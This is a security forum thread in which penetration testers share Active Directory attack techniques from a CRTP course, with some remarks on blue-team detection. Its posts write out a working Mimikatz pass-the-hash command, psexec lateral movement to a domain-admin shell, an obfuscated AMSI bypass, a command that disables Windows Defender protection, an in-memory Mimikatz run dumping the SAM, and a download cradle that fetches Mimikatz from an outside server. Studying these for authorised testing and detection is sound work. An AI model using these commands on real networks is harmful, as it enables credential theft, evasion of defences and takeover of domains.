Announcement

Collapse
No announcement yet.

Mimikatz and PTT are cool, Mimikatz PTT are fun

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Mimikatz and PTT are cool, Mimikatz PTT are fun

    In a recent 7MS episode (https://7ms.us/7ms-455-tales-of-inte...pwnage-part-24/) I admitted how I really hadn't done my homework with Mimikatz and PTT, assuming Mimikatz's effectiveness was limited since EDRs were so good and catching it on disk. It wasn't until taking CRTP (https://7ms.us/tag/crtp/) with Gh0stHax that I realized how powerful and sneaky it can be by using it in combination with PS remoting. Now that I've had a chance to use CRTP skills on some new pentests, I have to say:

    1. Boy, was I doing a lot of phases of a test the haaaaaard way when I didn't need to
    2. It feels just downright wrong to find an NTLM hash (using lsassy, secretsdump, etc.) and then be able to fire up mimikatz.exe and do this:

    Code:
    sekurlsa::pth /user:administrator /ntlm:hash-of-the-administrator-user /domain:yourdomain.com
    Once you do, bam! you get a new cmd.exe window with domain administrator privileges. Pair your new powers with something like this for even more fun:

    Code:
    psexec \\VICTIM-SERVER cmd.exe
    Poof! You've popped a new cmd.exe on VICTIM-SERVER with DA rights!

    This has gotten me even more interested in the blue team side of things, and in the lab I'm trying to better understand additional layers of controls that can be built in to AD, etc. to keep these hashes out of evil hands!
    Brian Johnson
    7 Minute Security
    Podcaster | Security Consultant

  • #2
    Oh yeah.. that is some good stuff right there. If you just want some command execution you can also use Powershell Remoting. In this case we are starting a remote session and bypassing AMSI. Then we background the session, disable Windows Defender and Invoke Mimikatz directly into memory in the session. We enter back into the session and run Mimikatz. I loved learning this method in the CRTP lab.

    Code:
    $sess = New-PSSession -ComputerName computer1
    sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s' ,'System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
    exit
    Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
    Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $sess
    Enter-PSSession $sess
    Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
    Gh0sthax
    Principal Security Engineer

    Comment


    • #3
      Also since you mentioned Blue Team stuff.. this is probably old news to some. But it was quite popular at one point to download and invoke tools like Mimikatz in Memory from PowerShell.
      Code:
       iex (iwr http[s]://my[.]own.server/tools/Invoke-Mimikatz.ps1 -UseBasicParsing)
      . Often times you would now encode that or use a download cradle. On the blue team your EDR or log source would want to look for any variation of the iex or other Powershell download methods. They are heavily obfuscated now to bypass EDR. One of the most popular tools for doing this is called Invoke-Obfuscation. If you are a defender the more you know about techniques like this the better you will be at defense. You should be downloading and encoding some sample tools to see if you could detect and obfuscated script.

      Happy Hunting.
      Last edited by Gh0stHax; 02-21-2021, 08:23 PM.
      Gh0sthax
      Principal Security Engineer

      Comment

      Working...
      X